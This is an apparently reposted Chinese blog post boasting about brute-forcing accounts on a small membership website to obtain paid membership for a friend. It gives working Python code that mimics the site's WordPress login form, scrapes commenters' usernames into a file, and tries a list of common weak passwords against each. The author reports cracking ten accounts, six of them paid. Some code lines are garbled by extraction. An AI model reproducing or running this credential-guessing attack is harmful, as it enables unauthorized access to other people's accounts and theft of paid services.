python会员折扣_Python骚操作 | 用python爆破某会员网站
早上照例閑逛,發現簡書出了個很有意思的作者,ID叫做爺是奧巴馬,發的文章也是不同凡響,上來就對別人家網站玩爆破。。。
————————————————————————————————
暑假在家上網,qq群里一位好友給我說他想要某個網站的會員,ps(是個小網站),本著助人為樂的精神我去踩了點。。。
然后就有了思路(騷操作)
先講一下思路
1 .先注冊用戶登錄
2.flidder抓包
3.python 模擬登錄
4.在評論區抓取評論的用戶名
5.弱密碼爆破
登錄
登錄頁面如下
flidder抓包
抓包之后發現有以下幾個字段
'log': 'admin', # 用戶名
'pwd': 'admin', # 密碼
'wp-submit': '登錄',
'redirect_to': '',
'wpuf_login': 'true',
'action': 'login',
'_wpnonce': '4b4e82f670',
'_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'
只要用戶名和密碼不同,其他的不變
python 模擬登錄
這部分就比較簡單,用到requests模塊
import re
import requests
def baopo(log):
url = 'http://XXXXXX.com/%e7%99%bb%e5%bd%95'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Referer': 'http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true' #網站打碼
}
data = {
'log': log,
'pwd': 'admin',
'wp-submit': '登錄',
'redirect_to': '',
'wpuf_login': 'true',
'action': 'login',
'_wpnonce': '4b4e82f670',
'_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'
}
a = requests.post(url, headers=headers, data=data)
if a.history == []:
return False
else:
return True
得到用戶名
這部分主要用到正則模塊匹配就行了
import re
import requests
def gethtml(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Referer': 'http://XXXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true'
}
html = requests.get(url, headers=headers)
return html.text
for i in range(30,36):
if i == 1:
url = 'http:/XXXXXX.com/'
else:
url = 'http://XXXXXXX.com/page/' + str(i)
html = gethtml(url)
for each in re.findall('
print(each)
if int(each[-4:].replace('/','').replace('s','')) < 100:
for each2 in re.findall('(.*?):', gethtml(each)):
if 'href' in each2:
each2 = re.findall("class='url'>(.*?)
", each2)[0]f = open('yonghu.txt','a+',encoding='utf-8')
f.write(each2)
f.write('\n')
f.close()
print(each2)
得到用戶名保存在yonghu.txt文件里
開始爆破
本來想加上多線程,但因為網站太垃圾了,訪問過快會限制,那就算了吧。。。
import requests
import multiprocessing
def baopo(log):
url = 'http://XXXXX.com/%e7%99%bb%e5%bd%95'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Referer': 'http://XXXXX.com/%e7%99%bb%e5%bd%95?loggedout=true'
}
pwd =['000000','111111','11111111','112233','123123','123321','123456','12345678','654321','666666','888888','abcdef','abcabc',\
'abc123','a1b2c3','aaa111','123qwe','qwerty','qweasd','admin',\
'password','p@ssword','passwd','iloveyou','5201314','88888888','147258369','1234567890']
pwd.append(log)
for each in pwd:
print('using>>>'+each)
data = {
'log': log,
'pwd': each,
'wp-submit': '登錄',
'redirect_to': '',
'wpuf_login': 'true',
'action': 'login',
'_wpnonce': '4b4e82f670',
'_wp_http_referer': '/%e7%99%bb%e5%bd%95?loggedout=true'
}
a = requests.post(url, headers=headers, data=data)
if a.history == []:
continue
else:
f = open('success.txt','a+',encoding='utf-8')
f.write('User:')
f.write(log)
f.write(' Passwd:')
f.write(each)
print('succeed!\n')
return True
f = open('yonghu.txt','r', encoding='utf-8')
yonghuming = set()
yonghuming.add('adminn')
for line in f.readlines():
line = line.strip()
yonghuming.add(line)
if __name__ == '__main__':
for each in yonghuming:
#p = multiprocessing.Process(target=baopo, args=(each,))
#p.start()
print(each)
baopo(each)
#print(yonghuming)
運行效果圖
收獲
放在服務器上跑了一晚,爆出來10個賬號,其中6個充值了會員,美吱吱
————————————————————————————————
你想更深入了解學習Python知識體系,你可以看一下我們花費了一個多月整理了上百小時的幾百個知識點體系內容:
總結
以上是生活随笔為你收集整理的python会员折扣_Python骚操作 | 用python爆破某会员网站的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 修改ELF可执行文件entry入口感染一
- 下一篇: windows+python+openc